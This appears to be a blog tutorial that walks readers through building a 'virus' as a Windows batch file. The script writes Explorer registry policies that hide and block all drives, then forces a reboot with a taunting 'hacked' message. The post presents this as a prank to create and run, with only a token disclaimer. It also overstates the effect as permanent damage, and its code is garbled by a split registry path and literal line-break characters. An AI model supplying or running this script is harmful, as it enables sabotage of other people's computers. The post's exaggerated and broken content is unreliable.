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    Create a Virus That Disable All Hard Disks

    Create a Virus That Disable All Hard Disks

    The present world is computer world and to become smart you must be smart in both the real world and the virtual world. So we always keep on sharing different tricks for you that helps you to become smart in the virtual world. so today in this article i have a new thing for you. You must deal with viruses in this computer world, but have you create any virus till now, may be no so i have a method to Create a Virus That Disable All Hard Disks. The method is very simple and easy and you will be able to create a virus by your own. Just follow the below steps to proceed.
    Note:- This virus can permanently damage your computer so don’t use it at your own risk, as we are not responsible for any damage occur. As this is only for knowledge and security purposes and to make you aware about these viruses.

    Create a Virus That Disable All Hard Disks

    Create a Virus That Disable All Hard Disks
    Create a Virus That Disable All Hard Disks
    This is actually a notepad trick that will disable all the hard disks of a computer. The method is very simple and you don’t need to code anything you just have to copy and paste the code that i will give in the below steps.
    1. First of all click on start and type Notepad and then press enter.Notepad
    2. Now copy the below code and paste in the notepad
      REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\nREG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\nshutdown -r -c \”Lolllll! Your system is hacked by WaZiristani HaXor!\” -f
    3. Now save this file as virus.bat .3
    4. Now when you run this file in a computer all the hard drives will get disabled and computer will get crash.
    So this is method to Create a Virus That Disable All Hard Disks. By this all hard drive will stop working and your computer might shutdown permanently. And this virus is very harmful and you can even test your antivirus by scanning this file as if it discover this then its working good else you need to change it. If you like the post then don’t forget to share it with your friends too.
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